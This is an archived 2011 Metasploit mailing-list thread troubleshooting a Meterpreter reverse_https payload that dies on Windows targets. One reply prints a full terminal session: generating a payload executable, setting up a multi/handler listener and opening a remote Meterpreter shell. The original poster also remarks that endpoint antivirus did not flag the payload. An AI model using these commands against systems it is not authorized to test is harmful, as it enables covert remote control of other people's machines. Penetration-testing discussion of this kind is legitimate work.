metasploit-framework March 2011 archive

Re: [framework] Meterpreter Reverse_HTTPS dies

From: c0lists <lists_at_nospam>
Date: Thu Mar 03 2011 - 16:23:04 GMT
To: JOhn Mistikopoulos <mailtest1223133456@gmail.com>

Make sure your LPORT is right; by default reverse_https connects to 8443.

I just tested with current svn and it worked.

chris@carnal0wnage:~/trunk$ ./msfpayload windows/meterpreter/reverse_https LHOST=y.y.y.y X>demohttps.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_https
 Length: 369
Options: LHOST=y.y.y.y
chris@carnal0wnage:~/trunk$ file demohttps.exe
demohttps.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
chris@carnal0wnage:~/trunk$ ./msfconsole

      =[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 342 auxiliary
+ -- --=[ 257 payloads - 27 encoders - 8 nops
       =[ svn r11870 updated today (2011.03.03)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://y.y.y.y:8443/
[*] Starting the payload handler...
[*] x.x.x.x:23735 Request received for /AyCku...
[*] x.x.x.x:23735 Staging connection for target yCku received...
[*] Patching Target ID yCku into DLL
[*] x.x.x.x:23736 Request received for /ByCku...
[*] x.x.x.x:23736 Stage connection for target yCku received...
[*] Meterpreter session 1 opened (y.y.y.y:8443 -> x.x.x.x:23736) at Thu Mar 03 16:17:48 +0000 2011

meterpreter > sysinfo
Computer : COMPUTER
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language : en_US
Meterpreter: x86/win32
meterpreter >

On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos
<mailtest1223133456@gmail.com> wrote:
> I have tried numerous scenarios such as:
> 1. Middle proxy servers (more than 3 different web proxy software)
> 2. A single proxy server
> 3. No proxy server
> 4. Over the internet and locally (get the same error)
> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
> 6. Tested with IE6, unpatched.
> 7. Tested with different user accounts and group policies.
> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as a
> threat)
> 9. Tested without any AV protection or Firewall-IPS.
>
> When I run the payload (for example the "exe" file on an unprotected PC - no
> AV, no IPS) I see its name in the task manager just for a while and then it
> dies.
> However, I don't see any instance of iexplore.exe running.
>
>
> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm@metasploit.com> wrote:
>>
>> On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
>> > And then, the listener stops giving any other info.
>> > I went to the victim PC and realized that the payload exe had already
>> > died.
>> > I couldn't see it on the task manager.
>> > Concurrently, I had been running wireshark.
>> > The two last packets were:
>> > 1. Victim => Listener (RST, ACK)
>> > 2. Listener => Victim (FIN, ACK)
>> >
>> > Finally I don't get any connections.
>> > Does anyone know how to fix this?
>>
>> Is there any network proxy/filter between the target and yourself? Is
>> the target running an endpoint protection product or HIPS? Is the target
>> process a user-process (IE) or a system process (assuming IE/user-land)?
>>
>> The reverse_https payload is finicky based on the WinInet profile of the
>> user running the code.
>>
>> -HD
>> _______________________________________________
>> https://mail.metasploit.com/mailman/listinfo/framework